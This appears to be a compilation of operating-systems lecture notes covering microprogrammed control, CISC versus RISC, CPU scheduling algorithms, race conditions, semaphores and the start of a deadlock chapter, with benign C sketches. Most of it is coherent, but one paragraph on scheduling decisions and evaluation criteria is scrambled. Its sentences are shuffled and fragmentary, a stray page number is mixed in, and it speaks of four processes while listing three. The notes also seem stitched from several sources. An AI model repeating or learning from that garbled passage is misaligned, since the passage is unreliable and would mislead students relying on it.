Instead of microprogramming, the controller can be made from logic hardware. To design the circuit, all you have to do is prepare a truth table (6 input columns — the op-code (4 bits) and N, Z — and 22 output columns), and generate the logic. There is no reason why this hardware circuit could not decode an instruction in ONE clock period — a lot faster than the microcode solution. Microcode interpretation may be relatively slow, and it gets slower the more instructions there are, as you can see by examining (Tanenbaum, 1990). On the other hand, if implemented on a chip, the control store takes up a lot of chip space.

The microprogrammed solution allows arbitrarily complex instructions to be built up. It may also be more flexible: at one time there were many machines that users could microprogram themselves, producing, for example, an instruction set optimised for the execution of C programs, another for COBOL programs, etc. And there were computers which differed only by their microcode.

Figure 6.7 shows the full Mac-1 CPU with its microcontroller unit.

Figure 6.7: Mac-1 CPU including control (from Tanenbaum, Structured Computer Organisation, 3rd ed.)

CISC versus RISC

Machines with large sets of complex (and perhaps slow) instructions, implemented with microcode, are called CISC — complex instruction set computer. Those with small sets of relatively simple instructions, probably implemented in logic, are called RISC — reduced instruction set computer. Most early machines — before about 1965 — were RISC. Then the fashion switched to CISC. Now the fashion is switching back to RISC, albeit with some special go-faster features that were not present on early RISC machines.

CISC machines are easier to program in machine and assembly code (see next chapter), because they have a richer set of instructions. But nowadays fewer and fewer programmers use assembly code, and compilers are becoming better. It comes down to a trade-off between complexity of `silicon' (microcode and CISC) and complexity of software (highly efficient optimising compilers and RISC).

CPU Scheduling

What is CPU scheduling? Determining which processes run when there are multiple runnable processes. Why is it important? Because it can have a big effect on resource utilization and the overall performance of the system.

By the way, the world went through a long period (late 80's, early 90's) in which the most popular operating systems (DOS, Mac) had NO sophisticated CPU scheduling algorithms. They were single-threaded and ran one process at a time until the user directed them to run another process. Why was this true? More recent systems (Windows NT) are back to having sophisticated CPU scheduling algorithms. What drove the change, and what will happen in the future?

Basic assumptions behind most scheduling algorithms:

• There is a pool of runnable processes contending for the CPU.
• The processes are independent and compete for resources.
• The job of the scheduler is to distribute the scarce resource of the CPU to the different processes ``fairly'' (according to some definition of fairness) and in a way that optimizes some performance criteria.

In general, these assumptions are starting to break down. First of all, CPUs are not really that scarce — almost everybody has several, and pretty soon people will be able to afford lots. Second, many applications are starting to be structured as multiple cooperating processes. So, a view of the scheduler as mediating between competing entities may be partially obsolete.

How do processes behave? First, the CPU/IO burst cycle. A process will run for a while (the CPU burst), perform some IO (the IO burst), then run for a while more (the next CPU burst). How long between IO operations? It depends on the process:

• IO-bound processes: processes that perform lots of IO operations. Each IO operation is followed by a short CPU burst to process the IO.
• CPU-bound processes: processes that perform lots of computation and do little IO. They tend to have a few long CPU bursts.

When you look at CPU burst times across the whole system, they have the exponential or hyperexponential distribution in Fig. 5.2.

One of the things a scheduler will typically do is switch the CPU to another process when one process does IO. Why? The IO will take a long time, and we don't want to leave the CPU idle while we wait for the IO to finish.

What are the possible process states?

• Running — the process is running on the CPU.
• Ready — ready to run, but not actually running on the CPU.
• Waiting — waiting for some event, like IO, to happen.

Common example of interrupt handler . or wait for synchronization operation (like lock acquisition) to complete. A process does not give up CPU until it either terminates or performs IO. Difference between long and short term scheduling. Scheduler Efficiency: The scheduler doesn't perform any useful work. so any time it takes is pure overhead. typically want good throughput or turnaround time. Consider performance of FCFS algorithm for three compute-bound processes. When a process terminates. both of these are still usually important (after all.on completion of interrupt handler. When process switches from waiting to ready state (on completion of IO or acquisition of a lock. P2. throughput or turnaround time is not really relevant . One ready queue. Long term scheduler is given a set of processes and decides which ones should start to run. In batch systems. Short term scheduler decides which of the available jobs that long term scheduler has decided are runnable to actually run. (What is utilization. P2 (takes 3 seconds) and P3 (takes 3 seconds). Big difference: Batch and Interactive systems. need to make the scheduler very efficient. Throughput: number of processes completed per unit time. Let's start looking at several vanilla scheduling algorithms. it has preempted the running process. Could be because of IO request. Turnaround Time: mean time from submission to completion of process. want some computation to happen). they may suspend because of IO or because of preemption. Waiting Time: Amount of time spent ready to run but not running. If arrive in order P1. First-Come. for some systems. for example. by the way?). Another common case interrupt handler is the IO completion handler. And.some processes conceptually run forever. Response Time: Time between submission of requests and first response to the request. So. When process switches from running to ready .When do scheduling decisions take place? When does CPU choose which process to run? Are a variety of possibilities: • • When process switches from running to waiting. OS runs the process at head of queue. Once they start running. If scheduler switches processes in this case. but response time is usually a primary consideration. what is • Waiting Time? (24 + 27) / 3 = 17 78 . for example). In interactive systems. First-Served.timer interrupt in interactive systems. What if have 4 processes P1 (takes 24 seconds). because wait for child to terminate. P3. new processes come in at the end of the queue. • • How to evaluate scheduling algorithm? There are many possible criteria: • • • • • • CPU Utilization: Keep CPU utilization as high as possible.

Preemptive vs. non-preemptive. A non-preemptive scheduler only makes a scheduling decision when the running process voluntarily gives up the CPU; in effect, it allows every running process to finish its CPU burst. A preemptive scheduler reruns the scheduling decision whenever a process becomes ready; if the new process has priority over the running process, the CPU preempts the running process and executes the new process.

Consider 4 processes P1 (burst time 8), P2 (burst time 4), P3 (burst time 9) and P4 (burst time 5) that arrive one time unit apart, in the order P1, P2, P3, P4. Assume that after its burst happens, a process is not re-enabled for a long time (at least 100 time units, for example). What does a preemptive SJF scheduler do? What about a non-preemptive SJF scheduler?

Priority Scheduling. SJF is an example of a priority-based scheduling algorithm. Each process is given a priority, and the CPU executes the process with the highest priority. If multiple processes with the same priority are runnable, use some other criterion to choose between them — typically FCFS. Lower numbers represent higher priorities.

Assume we have 5 processes: P1 (burst time 10, priority 3), P2 (burst time 1, priority 1), P3 (burst time 2, priority 3), P4 (burst time 1, priority 4) and P5 (burst time 5, priority 2). What would a standard priority scheduler do?

The big problem with priority scheduling algorithms: starvation, or blocking, of low-priority processes. We can use aging to prevent this — make the priority of a process go up the longer it stays runnable but isn't run. In effect, the priorities of a given process then change over time.

What about interactive systems? There you cannot just let any process run on the CPU until it gives it up: the system must give responses to users in a reasonable time. So, use an algorithm called round-robin (RR) scheduling. It is similar to FCFS but with preemption. Have a time quantum or time slice. Let the first process in the ready queue run until it expires its quantum (i.e., runs for as long as the time quantum), then run the next process in the queue. If a process does IO before the timer goes off, no problem: just run the next process. But if a process expires its quantum, do a context switch: save the state of the running process and run the next process. Implementing round-robin requires timer interrupts: when you schedule a process, set the timer to go off after the time quantum amount of time expires.

The point of the algorithm is to fairly allocate the CPU between processes. Consider the waiting times under round robin for 3 processes P1 (burst time 24), P2 (burst time 3) and P3 (burst time 4) with time quantum 4. What happens, and what is the average waiting time? What gives the best waiting time?

What happens with a really small quantum? It looks like you've got a CPU that is 1/n as powerful as the real CPU, where n is the number of processes. The problem with a small quantum is context switch overhead. What about having a really small quantum supported in hardware? Then you have something called multithreading: give the CPU a bunch of registers and heavily pipeline the execution, then feed the processes into the pipe one by one. Treat memory access like IO: suspend the thread until the data comes back from the memory, and in the meantime execute other threads. Use computation to hide the latency of accessing memory.

What about a really big quantum? It turns into FCFS. Rule of thumb: you want 80 percent of the CPU bursts to be shorter than the time quantum.

How well does RR work? Well, it gives good response time, but can give bad waiting time.

Multilevel Queue Scheduling. Like RR, except have multiple queues. Classify processes into separate categories and give a queue to each category. So, you might have system, interactive and batch processes, with the priorities in that order. Could also allocate a percentage of the CPU to each queue.

Multilevel Feedback Queue Scheduling. Like multilevel queue scheduling, except processes can move between queues as their priority changes. Can be used to give IO bound and interactive processes CPU priority over CPU bound processes. Can also prevent starvation by increasing the priority of processes that have been idle for a long time.

A simple example of a multilevel feedback queue scheduling algorithm: have 3 queues, numbered 0, 1, 2, with corresponding priority, and preempt queue 2 processes when a new process becomes ready. A process goes into queue 0 when it becomes ready. When you run a process from queue 0, give it a quantum of 8 ms; if it expires its quantum, move it to queue 1. When you execute a process from queue 1, give it a quantum of 16 ms; if it expires its quantum, move it to queue 2. In queue 2, run a RR scheduler with a large quantum if in an interactive system, or an FCFS scheduler if in a batch system, and execute a task in queue 2 only when queues 0 and 1 are empty.
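Returning to the round-robin example above (P1 = 24, P2 = 3, P3 = 4, quantum 4), a small simulation answers the question. This is a sketch under the assumption that all three processes arrive at time 0; in that case cycling over a fixed array in order is equivalent to a FIFO requeue.

    #include <stdio.h>

    int main(void) {
        int burst[]     = {24, 3, 4};    /* P1, P2, P3, all arrive at t = 0 */
        int remaining[] = {24, 3, 4};
        int finish[3]   = {0};
        int n = 3, quantum = 4, clock = 0, left = n;

        while (left > 0) {
            for (int i = 0; i < n; i++) {
                if (remaining[i] == 0) continue;
                int slice = remaining[i] < quantum ? remaining[i] : quantum;
                clock += slice;
                remaining[i] -= slice;
                if (remaining[i] == 0) { finish[i] = clock; left--; }
            }
        }
        for (int i = 0; i < n; i++)
            printf("P%d: waiting time = %d\n", i + 1, finish[i] - burst[i]);
        return 0;
    }

This prints waiting times of 6, 4 and 7, for an average of about 5.7, noticeably better for the short jobs than FCFS in the order P1, P2, P3 would be.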

Another example of a multilevel feedback queue scheduling algorithm is the Unix scheduler. We will go over a simplified version that does not include kernel priorities. The Unix scheduler gives processes that have not recently used a lot of CPU priority over processes that have. Processes are given a base priority of 60, with lower numbers representing higher priorities. The system clock generates an interrupt between 50 and 100 times a second, so we will assume a value of 60 clock interrupts per second. The clock interrupt handler increments a CPU usage field in the PCB of the interrupted process every time it runs. Every second, the system recalculates the priority and CPU usage field of every process according to the following formulas:

• CPU usage field = CPU usage field / 2
• Priority = CPU usage field / 2 + base priority

So, when a process has not used much CPU recently, its priority rises. The priorities of IO bound and interactive processes therefore tend to be high, and the priorities of CPU bound processes tend to be low (which is what you want). The system always runs the highest priority process; if there is a tie, it runs the process that has been ready longest.

Unix also allows users to provide a ``nice'' value for each process: you can reduce the priority of your process to be ``nice'' to other processes (which may include your own). Nice values modify the priority calculation as follows:

• Priority = CPU usage field / 2 + base priority + nice value

In general, multilevel feedback queue schedulers are complex pieces of software that must be tuned to meet requirements.

Anomalies and system effects associated with schedulers. Priority interacts with synchronization to create a really nasty effect called priority inversion. A priority inversion happens when a low-priority thread acquires a lock, then a high-priority thread tries to acquire the lock and blocks. Any middle-priority threads will prevent the low-priority thread from running and unlocking the lock; in effect, the middle-priority threads block the high-priority thread. How do you prevent priority inversions? Use priority inheritance: any time a thread holds a lock that other threads are waiting on, give the thread the priority of the highest-priority thread waiting to get the lock. The problem is that priority inheritance makes the scheduling algorithm less efficient and increases the overhead.

Preemption can interact with synchronization in a multiprocessor context to create another nasty effect: the convoy effect. One thread acquires the lock, then suspends. Other threads come along, need to acquire the lock to perform their operations, and everybody suspends until the thread holding the lock wakes up. At this point the threads are synchronized, and will convoy their way through the lock, serializing the computation and driving down processor utilization. If you have non-blocking synchronization via operations like LL/SC, you don't get convoy effects caused by suspending a thread competing for access to a resource. Why not? Because threads don't hold resources and prevent other threads from accessing them.
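To tie the Unix formulas together, here is a small C sketch of the once-per-second recalculation described above. The structure and field names are illustrative; real Unix kernels differ in detail.

    /* Simplified Unix priority recalculation (base priority 60,
       lower number = higher priority). */
    #define BASE_PRIORITY 60

    struct proc {
        int cpu_usage;   /* incremented ~60 times/sec while the process runs */
        int nice;        /* user-supplied niceness, 0 by default */
        int priority;
    };

    void recompute_every_second(struct proc *p) {
        p->cpu_usage = p->cpu_usage / 2;                       /* decay */
        p->priority  = p->cpu_usage / 2 + BASE_PRIORITY + p->nice;
    }

For example, a process that just consumed a full second of CPU (usage 60) comes out at priority 75; after one idle second it falls to 67, and after another to 63, so it quickly regains competitiveness once it stops hogging the CPU.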

A similar effect arises when scheduling CPU and IO bound processes. Consider a FCFS algorithm with several IO bound processes and one CPU bound process. All of the IO bound processes execute their bursts quickly and queue up for access to the IO device. The CPU bound process then executes for a long time; during this time all of the IO bound processes have their IO requests satisfied and move back into the run queue. But they don't run: the CPU bound process is running instead, so the IO device idles. Finally, the CPU bound process gets off the CPU, and all of the IO bound processes run for a short time, then queue up again for the IO device. The result is poor utilization of the IO device: it is busy for a time while it processes the IO requests, then idle while the IO bound processes wait in the run queues for their short CPU bursts. In this case an easy solution is to give IO bound processes priority over CPU bound processes.

In general, a convoy effect happens when a set of processes need to use a resource for a short time, and one process holds the resource for a long time, blocking all of the other processes. It causes poor utilization of the other resources in the system.

CPU/Process Scheduling

The assignment of physical processors to processes allows processors to accomplish work. The problem of determining when processors should be assigned, and to which processes, is called processor scheduling or CPU scheduling. When more than one process is runnable, the operating system must decide which one to run first. The part of the operating system concerned with this decision is called the scheduler, and the algorithm it uses is called the scheduling algorithm.

Goals of Scheduling (Objectives)

In this section we try to answer the following question: what does the scheduler try to achieve? Many objectives must be considered in the design of a scheduling discipline. Some of these goals depend on the system one is using, for example a batch system, interactive system or real-time system, but there are also some goals that are desirable in all systems.

General Goals

Fairness: Fairness is important under all circumstances. A scheduler makes sure that each process gets its fair share of the CPU and no process suffers indefinite postponement. Note that giving equivalent or equal time is not necessarily fair; think of safety control and payroll at a nuclear plant.

Policy Enforcement: The scheduler has to make sure that the system's policy is enforced. For example, if the local policy is safety, then the safety control processes must be able to run whenever they want to, even if it means delay in payroll processes.

Efficiency: The scheduler should keep the system (or in particular the CPU) busy one hundred percent of the time when possible. If the CPU and all the Input/Output devices can be kept running all the time, more work gets done per second than if some components are idle.

Response Time: A scheduler should minimize the response time for interactive users.

Turnaround: A scheduler should minimize the time batch users must wait for an output.

Throughput: A scheduler should maximize the number of jobs processed per unit time.

A little thought will show that some of these goals are contradictory. It can be shown that any scheduling algorithm that favors some class of jobs hurts another class of jobs; the amount of CPU time available is finite, after all.

Preemptive Vs Nonpreemptive Scheduling

The scheduling algorithms can be divided into two categories with respect to how they deal with clock interrupts.

Nonpreemptive Scheduling

A scheduling discipline is nonpreemptive if, once a process has been given the CPU, the CPU cannot be taken away from that process. Following are some characteristics of nonpreemptive scheduling:

1. In a nonpreemptive system, short jobs are made to wait by longer jobs, but the overall treatment of all processes is fair.
2. In a nonpreemptive system, response times are more predictable, because incoming high priority jobs cannot displace waiting jobs.
3. In nonpreemptive scheduling, the scheduler executes jobs in the following two situations:
   a. When a process switches from the running state to the waiting state.
   b. When a process terminates.

Preemptive Scheduling

A scheduling discipline is preemptive if, once a process has been given the CPU, the CPU can be taken away. The strategy of allowing processes that are logically runnable to be temporarily suspended is called preemptive scheduling, and it is in contrast to the "run to completion" method.

Scheduling Algorithms

CPU scheduling deals with the problem of deciding which of the processes in the ready queue is to be allocated the CPU. Following are some scheduling algorithms we will study:

• FCFS Scheduling
• Round Robin Scheduling
• SJF Scheduling
• SRT Scheduling
• Priority Scheduling
• Multilevel Queue Scheduling
• Multilevel Feedback Queue Scheduling

First-Come-First-Served (FCFS) Scheduling

Other names of this algorithm are:

• First-In-First-Out (FIFO)

• Run-to-Completion
• Run-Until-Done

First-Come-First-Served is perhaps the simplest scheduling algorithm. Processes are dispatched according to their arrival time on the ready queue. Being a nonpreemptive discipline, once a process has the CPU, it runs to completion. The FCFS scheduling is fair in the formal or human sense of fairness, but it is unfair in the sense that long jobs make short jobs wait and unimportant jobs make important jobs wait. FCFS is more predictable than most other schemes, and the code for FCFS scheduling is simple to write and understand.

One of the major drawbacks of this scheme is that the average waiting time is often quite long. The FCFS scheme is also not useful in scheduling interactive users because it cannot guarantee good response time. The First-Come-First-Served algorithm is therefore rarely used as a master scheme in modern operating systems, but it is often embedded within other schemes.

Round Robin Scheduling

One of the oldest, simplest, fairest and most widely used algorithms is round robin (RR). In round robin scheduling, processes are dispatched in a FIFO manner but are given a limited amount of CPU time called a time-slice or a quantum. If a process does not complete before its CPU time expires, the CPU is preempted and given to the next process waiting in the queue; the preempted process is then placed at the back of the ready list.

Round robin scheduling is preemptive (at the end of the time-slice), therefore it is effective in time-sharing environments in which the system needs to guarantee reasonable response times for interactive users. The only interesting issue with the round robin scheme is the length of the quantum. Setting the quantum too short causes too many context switches and lowers CPU efficiency; on the other hand, setting the quantum too long may cause poor response time and approximates FCFS. In any event, the average waiting time under round robin scheduling is often quite long.

Shortest-Job-First (SJF) Scheduling

Another name for this algorithm is Shortest-Process-Next (SPN). Shortest-Job-First (SJF) is a nonpreemptive discipline in which the waiting job (or process) with the smallest estimated run-time-to-completion is run next. In other words, when the CPU is available, it is assigned to the process that has the smallest next CPU burst.

The SJF algorithm favors short jobs (or processes) at the expense of longer ones. Since the SJF scheduling algorithm gives the minimum average waiting time for a given set of processes, it is optimal in that respect. The SJF scheduling is especially appropriate for batch jobs for which the run times are known in advance.
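A non-preemptive SJF dispatcher reduces to a scan for the smallest estimated burst among the ready processes. A minimal C sketch (the names are illustrative, and this is only the selection step, not a full scheduler):

    /* Non-preemptive SJF: when the CPU becomes free, pick the ready process
       with the smallest estimated run time. */
    int pick_sjf(const int est_burst[], const int ready[], int n) {
        int best = -1;
        for (int i = 0; i < n; i++) {
            if (!ready[i]) continue;
            if (best < 0 || est_burst[i] < est_burst[best])
                best = i;
        }
        return best;   /* index of the process to run, or -1 if none ready */
    }

A preemptive variant (shortest remaining time) would rerun this selection whenever a new process becomes ready, comparing remaining times rather than total estimates.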

The obvious problem with the SJF scheme is that it requires precise knowledge of how long a job or process will run, and this information is not usually available. The best the SJF algorithm can do is to rely on user estimates of run times. In a production environment where the same jobs run regularly, it may be possible to provide reasonable estimates of run time, based on the past performance of the process. But in a development environment users rarely know how their program will execute.

Like FCFS, SJF is nonpreemptive; therefore, it is not useful in a timesharing environment in which reasonable response time must be guaranteed.

The Shortest-Job-First (SJF) algorithm is a special case of the general priority scheduling algorithm: an SJF algorithm is simply a priority algorithm where the priority is the inverse of the (predicted) next CPU burst. That is, the longer the CPU burst, the lower the priority, and vice versa.

Priority Scheduling

The basic idea is straightforward: each process is assigned a priority, and the runnable process with the highest priority is allowed to run. Equal-priority processes are scheduled in FCFS order.

Priority can be defined either internally or externally. Internally defined priorities use some measurable quantities or qualities to compute the priority of a process. Examples of internal priorities are:

• Time limits.
• Memory requirements.
• File requirements, for example, the number of open files.
• CPU vs I/O requirements.

Externally defined priorities are set by criteria that are external to the operating system, such as:

• The importance of the process.
• The type or amount of funds being paid for computer use.
• The department sponsoring the work.
• Politics.

Priority scheduling can be either preemptive or nonpreemptive:

• A preemptive priority algorithm will preempt the CPU if the priority of the newly arrived process is higher than the priority of the currently running process.
• A nonpreemptive priority algorithm will simply put the new process at the head of the ready queue.

A major problem with priority scheduling is indefinite blocking, or starvation. A solution to the problem of indefinite blockage of low-priority processes is aging. Aging is a technique of gradually increasing the priority of processes that wait in the system for a long period of time.

Multilevel Queue Scheduling

A multilevel queue scheduling algorithm partitions the ready queue into several separate queues. Processes are permanently assigned to one queue, based on some property of the process, such as:

• Memory size
• Process priority
• Process type

The algorithm chooses the process from the occupied queue that has the highest priority, and runs that process either preemptively or nonpreemptively. Each queue has its own scheduling algorithm or policy, which it uses to schedule the processes in its queue. For example:

• 80% of the CPU time to the foreground queue, using RR.
• 20% of the CPU time to the background queue, using FCFS.

Possibility 1: If each queue has absolute priority over lower-priority queues, then no process in a queue can run unless the queues for all higher-priority processes are empty. For instance, no process in the batch queue could run unless the queues for system processes, interactive processes and interactive editing processes were all empty.

Possibility 2: If there is a time slice between the queues, then each queue gets a certain share of the CPU time.

Since processes do not move between queues, this policy has the advantage of low scheduling overhead, but it is inflexible.

Multilevel Feedback Queue Scheduling

The multilevel feedback queue scheduling algorithm, in contrast, allows a process to move between queues. It uses many ready queues and associates a different priority with each queue. If a process uses too much CPU time, it is moved to a lower-priority queue, as the sketch below illustrates.
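The heart of a multilevel feedback queue is just a pair of movement rules. This is an illustrative C fragment (not from the original text), assuming three queues with queue 0 the highest priority:

    /* Multilevel feedback: demote a process that used its full quantum,
       promote (age) one that has waited too long. */
    #define NQUEUES 3

    void on_quantum_expired(int queue_of[], int pid) {
        if (queue_of[pid] < NQUEUES - 1)
            queue_of[pid]++;           /* used too much CPU: move down */
    }

    void on_long_wait(int queue_of[], int pid) {
        if (queue_of[pid] > 0)
            queue_of[pid]--;           /* aging: move back up, prevents starvation */
    }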

Similarly, a process that waits too long in a lower-priority queue may be moved to a higher-priority queue. Note that this form of aging prevents starvation. As an example:

• A process entering the ready queue is placed in queue 0.
• If it does not finish within 8 milliseconds, it is moved to the tail of queue 1.
• If it does not complete there, it is preempted and placed into queue 2.
• Processes in queue 2 run on a FCFS basis, and only when queue 0 and queue 1 are empty.

CHAPTER 6
INTERPROCESS COMMUNICATION

Since processes frequently need to communicate with other processes, there is a need for well-structured communication, without using interrupts, among processes.

Race Conditions

In operating systems, processes that are working together often share some common storage (main memory, a file, etc.) that each process can read and write. When two or more processes are reading or writing some shared data and the final result depends on who runs precisely when, the resulting situations are called race conditions. For example, if several 'customer' threads examine and update a shared variable, only one customer thread at a time should be allowed to examine and update it.

Race conditions are also possible inside operating systems themselves. If the ready queue is implemented as a linked list, and the ready queue is being manipulated during the handling of an interrupt, then interrupts must be disabled to prevent another interrupt from arriving before the first one completes; if interrupts are not disabled, the linked list could become corrupt.

Concurrently executing threads that share data need to synchronize their operations and processing in order to avoid race conditions on shared data.
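The following short pthreads program (mine, not from the original text) makes the race concrete: two threads perform an unprotected read-update-write on a shared counter, and lost updates usually leave the final value below the expected 2,000,000.

    #include <pthread.h>
    #include <stdio.h>

    long counter = 0;                      /* shared, unprotected */

    void *worker(void *arg) {
        (void)arg;
        for (int i = 0; i < 1000000; i++)
            counter++;                     /* read-update-write: not atomic */
        return NULL;
    }

    int main(void) {
        pthread_t a, b;
        pthread_create(&a, NULL, worker, NULL);
        pthread_create(&b, NULL, worker, NULL);
        pthread_join(a, NULL);
        pthread_join(b, NULL);
        printf("counter = %ld\n", counter); /* usually < 2000000 */
        return 0;
    }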

Critical Section

How do we avoid race conditions? The key to preventing trouble involving shared storage is to find some way to prohibit more than one process from reading and writing the shared data simultaneously. That part of the program where the shared memory is accessed is called the critical section. To avoid race conditions and flawed results, one must identify the critical sections in each thread. The characteristic properties of code that forms a critical section are:

• Code that references one or more variables in a "read-update-write" fashion while any of those variables is possibly being altered by another thread.
• Code that alters one or more variables that are possibly being referenced in "read-update-write" fashion by another thread.
• Code that uses a data structure while any part of it is possibly being altered by another thread.
• Code that alters any part of a data structure while it is possibly in use by another thread.

Here, the important point is that when one process is executing shared modifiable data in its critical section, no other process should be allowed to enter its critical section.

Mutual Exclusion

Mutual exclusion is a way of making sure that if one process is using a shared modifiable data item, the other processes are excluded from doing the same thing. Formally, while one process executes the shared variable, all other processes desiring to do so at the same moment should be kept waiting; when that process has finished executing the shared variable, one of the waiting processes should be allowed to proceed. In this fashion, each process executing the shared data (variables) excludes all others from doing so simultaneously.

Note that mutual exclusion needs to be enforced only when processes access shared modifiable data; when processes are performing operations that do not conflict with one another, they should be allowed to proceed concurrently.

Mutual Exclusion Conditions

If we could arrange matters such that no two processes were ever in their critical sections simultaneously, we could avoid race conditions. We need four conditions to hold to have a good solution for the critical section problem (mutual exclusion):

• No two processes may be inside their critical sections at the same moment.
• No assumptions are made about the relative speeds of processes or the number of CPUs.
• No process outside its critical section should block other processes.
• No process should wait arbitrarily long to enter its critical section.

Proposals for Achieving Mutual Exclusion

The mutual exclusion problem is to devise a pre-protocol (or entry protocol) and a post-protocol (or exit protocol) to keep two or more threads from being in their critical sections at the same time. Tanenbaum examines several proposals for the critical-section, or mutual exclusion, problem.

Proposal 1 - Disabling Interrupts (Hardware Solution)

Each process disables all interrupts just after entering its critical section and re-enables all interrupts just before leaving it. With interrupts turned off, the CPU cannot be switched to another process; hence, no other process will enter its critical section, and mutual exclusion is achieved. Disabling interrupts is sometimes a useful technique within the kernel of an operating system, but it is not appropriate as a general mutual exclusion mechanism for user processes. The reason is that it is unwise to give a user process the power to turn off interrupts.

Proposal 2 - Lock Variable (Software Solution)

In this solution, we consider a single, shared (lock) variable, initially 0. When a process wants to enter its critical section, it first tests the lock. If the lock is 0, the process sets it to 1 and then enters the critical section; if the lock is already 1, the process just waits until the (lock) variable becomes 0. Thus, a 0 means that no process is in its critical section, and a 1 means hold your horses: some process is in its critical section.

The flaw in this proposal is best explained by example. Suppose process A sees that the lock is 0. Before it can set the lock to 1, another process B is scheduled, runs, and sets the lock to 1. When process A runs again, it will also set the lock to 1, and the two processes will be in their critical sections simultaneously.

Proposal 3 - Strict Alternation

In this proposed solution, an integer variable 'turn' keeps track of whose turn it is to enter the critical section. Initially, process A inspects turn, finds it to be 0, and enters its critical section. Process B also finds it to be 0 and sits in a loop continually testing 'turn' to see when it becomes 1. Continuously testing a variable while waiting for some value to appear is called busy waiting.

Taking turns is not a good idea when one of the processes is much slower than the other. Suppose process 0 finishes its critical section quickly, so both processes are now in their noncritical sections. If process 0 now wants to enter its critical section again, it must wait for process 1 to take its turn, even though process 1 is still in its noncritical section. This violates condition 3 above: a process outside its critical section is blocking another process.

Using the System Calls 'sleep' and 'wakeup'

Basically, what the above proposals do is this: when a process wants to enter its critical section, it checks to see if entry is allowed. If it is not, the process goes into a tight loop and waits (i.e., starts busy waiting) until it is allowed to enter. This approach wastes CPU time. Now look at an interprocess communication primitive pair that blocks instead of wasting CPU time: sleep and wakeup.

• Sleep: a system call that causes the caller to block, that is, be suspended until some other process wakes it up.
• Wakeup: a system call that wakes up a process.

Both 'sleep' and 'wakeup' system calls have one parameter that represents a memory address, used to match up 'sleeps' and 'wakeups'.

As an example of how the sleep-wakeup system calls are used, consider the producer-consumer problem, also known as the bounded buffer problem. Two processes share a common, fixed-size (bounded) buffer. The producer puts information into the buffer and the consumer takes information out. Trouble arises when:

1. The producer wants to put a new item in the buffer, but the buffer is already full. Solution: the producer goes to sleep, to be awakened when the consumer has removed data.
2. The consumer wants to remove data from the buffer, but the buffer is already empty. Solution: the consumer goes to sleep until the producer puts some data in the buffer and wakes the consumer up.

This approach, however, leads to the same race conditions we have seen in earlier approaches, because access to the shared 'count' of items is unconstrained. The essence of the problem is that a wakeup call sent to a process that is not (yet) sleeping is lost.

The Bounded Buffer Producers and Consumers

The bounded buffer producers and consumers problem assumes that there is a fixed buffer size, i.e., a finite number of slots is available. Statement of the problem: suspend the producers when the buffer is full, suspend the consumers when the buffer is empty, and make sure that only one process at a time manipulates the buffer, so there are no race conditions or lost updates.

Semaphores

A semaphore is a protected variable whose value can be accessed and altered only by the operations P and V and an initialization operation (semaphore-initialize). Binary semaphores can assume only the value 0 or the value 1; counting semaphores, also called general semaphores, can assume any nonnegative value.

The P (or wait or sleep or down) operation on a semaphore S, written P(S) or wait(S), operates as follows:

    P(S):   IF S > 0
            THEN S := S - 1
            ELSE (wait on S)

The V (or signal or wakeup or up) operation on a semaphore S, written V(S) or signal(S), operates as follows:

    V(S):   IF (one or more processes are waiting on S)
            THEN (let one of these processes proceed)
            ELSE S := S + 1

Operations P and V are done as single, indivisible, atomic actions. It is guaranteed that once a semaphore operation has started, no other process can access the semaphore until the operation has completed. Mutual exclusion on the semaphore S is enforced within P(S) and V(S). If several processes attempt a P(S) simultaneously, only one process is allowed to proceed; the other processes are kept waiting, but the implementation of P and V guarantees that processes will not suffer indefinite postponement. Semaphores solve the lost-wakeup problem.

Producer-Consumer Problem Using Semaphores

The solution to the producer-consumer problem uses three semaphores, namely full, empty and mutex. The semaphore 'full' is used for counting the number of slots in the buffer that are full, 'empty' counts the number of slots that are empty, and the semaphore 'mutex' makes sure that the producer and consumer do not access the modifiable shared sections of the buffer simultaneously.

Initialization:

• Set full buffer slots to 0, i.e., semaphore full = 0.
• Set empty buffer slots to N, i.e., semaphore empty = N.
• To control access to the critical section, set mutex to 1, i.e., semaphore mutex = 1.

    Producer ( )
      WHILE (true)
        produce-Item ( );
        P (empty);
        P (mutex);
        enter-Item ( );
        V (mutex);
        V (full);

    Consumer ( )
      WHILE (true)
        P (full);
        P (mutex);
        remove-Item ( );
        V (mutex);
        V (empty);
        consume-Item (Item);
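The pseudocode above translates almost directly into POSIX semaphores, where sem_wait corresponds to P and sem_post to V. A runnable C sketch; the buffer size and item count are chosen arbitrarily for illustration:

    #include <pthread.h>
    #include <semaphore.h>
    #include <stdio.h>

    #define N 8                            /* buffer slots */

    int buffer[N];
    int in = 0, out = 0;
    sem_t full, empty, mutex;              /* full = 0, empty = N, mutex = 1 */

    void *producer(void *arg) {
        (void)arg;
        for (int item = 0; item < 32; item++) {
            sem_wait(&empty);              /* P(empty): wait for a free slot */
            sem_wait(&mutex);              /* P(mutex): enter critical section */
            buffer[in] = item; in = (in + 1) % N;
            sem_post(&mutex);              /* V(mutex) */
            sem_post(&full);               /* V(full): one more full slot */
        }
        return NULL;
    }

    void *consumer(void *arg) {
        (void)arg;
        for (int k = 0; k < 32; k++) {
            sem_wait(&full);               /* P(full): wait for an item */
            sem_wait(&mutex);
            int item = buffer[out]; out = (out + 1) % N;
            sem_post(&mutex);
            sem_post(&empty);              /* V(empty): one more empty slot */
            printf("consumed %d\n", item);
        }
        return NULL;
    }

    int main(void) {
        pthread_t p, c;
        sem_init(&full, 0, 0);
        sem_init(&empty, 0, N);
        sem_init(&mutex, 0, 1);
        pthread_create(&p, NULL, producer, NULL);
        pthread_create(&c, NULL, consumer, NULL);
        pthread_join(p, NULL);
        pthread_join(c, NULL);
        return 0;
    }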

CHAPTER 7
DEADLOCK

Definition

“Crises and deadlocks when they occur have at least this advantage, that they force us to think.” - Jawaharlal Nehru (1889 - 1964), Indian political leader

A set of processes is in a deadlock state if each process in the set is waiting for an event that can be caused only by another process in the set. In other words, each member of the set of deadlocked processes is waiting for a resource that can be released only by a deadlocked process. None of the processes can run, none of them can release any resources, and none of them can be awakened. It is important to note that the number of processes and the number and kind of resources possessed and requested are unimportant.

The resources may be either physical or logical. Examples of physical resources are printers, tape drives, memory space, and CPU cycles. Examples of logical resources are files, semaphores, and monitors.

